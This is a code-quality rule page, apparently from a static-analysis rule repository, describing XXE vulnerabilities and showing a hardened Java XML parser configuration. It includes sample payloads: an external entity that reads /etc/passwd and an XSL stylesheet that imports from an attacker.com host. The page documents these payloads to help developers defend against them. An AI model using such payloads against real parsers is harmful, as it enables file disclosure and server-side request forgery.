Rules Repository / RSPEC-2755

XML parsers should not be vulnerable to XXE attacks

    Details

    • Type: Vulnerability Detection
    • Status: Active
    • Resolution: Unresolved
    • Labels:
    • Message:
      Disable access to external entities in XML parsing.
    • Highlighting:
      Java: Instantiation of the XMLInputFactory or SAXParserFactory or XMLReader or DocumentBuilderFactory object
    • Default Severity:
      Blocker
    • Impact:
      High
    • Likelihood:
      High
    • Default Quality Profiles:
      Sonar way
    • Targeted languages:
      C++, JavaScript, PHP, TypeScript
    • Covered Languages:
      C#, C, Java, Python
    • Remediation Function:
      Constant/Issue
    • Constant Cost:
      15min
    • Analysis Level:
      Semantic Analysis
    • Analysis Scope:
      Main Sources
    • Implementation details:
    • Common Rule:
      Yes
    • CWE:
      CWE-611, CWE-827
    • OWASP:
      A4
    • FindSecBugs:
      XXE_XMLSTREAMREADER, XXE_SAXPARSER, XXE_XMLREADER, XXE_DOCUMENT, XXE_DTD_TRANSFORM_FACTORY, XXE_XSLT_TRANSFORM_FACTORY
    • MSFT Roslyn:
      CA3075

      Description

      The XML specification allows the use of entities, which can be internal or external (file system or network access). External entities can lead to vulnerabilities such as confidential file disclosure or SSRF.

      For example, in this XML document an external entity reads the /etc/passwd file:

      <?xml version="1.0" encoding="utf-8"?>
        <!DOCTYPE test [
          <!ENTITY xxe SYSTEM "file:///etc/passwd">
        ]>
      <note xmlns="http://www.w3schools.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
        <to>&xxe;</to>  
        <from>Jani</from>
        <heading>Reminder</heading>
        <body>Don't forget me this weekend!</body>
      </note>
      

      In this XSL document, network access is allowed, which can lead to SSRF vulnerabilities:

      <?xml version="1.0" encoding="UTF-8"?>
      <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
        <xsl:import href="http://www.attacker.com/evil.xsl"/>
        <xsl:include href="http://www.attacker.com/evil.xsl"/>
        <xsl:template match="/">
          &content;
        </xsl:template>
      </xsl:stylesheet>
      

      It is recommended to disable access to external entities and network access in general.
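      One way to apply that recommendation in Java (the language named under Highlighting), as an added example that is not part of the rule text: the `HardenedXml` class and its method names are assumed, while the feature URIs and `XMLConstants` properties are the standard JAXP/Xerces ones.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.transform.TransformerConfigurationException;
import javax.xml.transform.TransformerFactory;
import org.xml.sax.SAXParseException;

// Hypothetical helper class (not part of the rule); names are illustrative.
public final class HardenedXml {

    // Builder for untrusted XML: with no DOCTYPE allowed, no entity such as "&xxe;" can be declared.
    public static DocumentBuilder newDocumentBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth if a DOCTYPE must be tolerated: never resolve external entities or DTDs.
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        // JAXP 1.5 properties: an empty string allows no protocol at all.
        dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        dbf.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        return dbf.newDocumentBuilder();
    }

    // Factory for XSLT: blocks xsl:import / xsl:include / document() from
    // reaching the network or file system, as the stylesheet above attempts.
    public static TransformerFactory newTransformerFactory() throws TransformerConfigurationException {
        TransformerFactory tf = TransformerFactory.newInstance();
        tf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
        return tf;
    }

    // True when the hardened builder refuses a document at its DOCTYPE instead of reading the file.
    public static boolean rejectsDoctype(String xml) throws Exception {
        try {
            newDocumentBuilder().parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
            return false;
        } catch (SAXParseException e) {
            return true;
        }
    }
}
```

      Passing the entity-bearing document from the description to `rejectsDoctype` yields true, because the parser stops at the DOCTYPE before any entity is resolved.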

          Issue Links

          1. C# RSPEC-5656 Language-Specification Active Unassigned
          2. Java RSPEC-2756 Language-Specification Active Unassigned
          3. Python RSPEC-5635 Language-Specification Active Unassigned
          4. PHP RSPEC-5640 Language-Specification Active Unassigned
          5. JavaScript RSPEC-5657 Language-Specification Active Unassigned
          6. C-Family RSPEC-5684 Language-Specification Active Unassigned

              People

              • Assignee: Unassigned
              • Reporter: ann.campbell.2 Ann Campbell
              • Votes: 0
              • Watchers: 3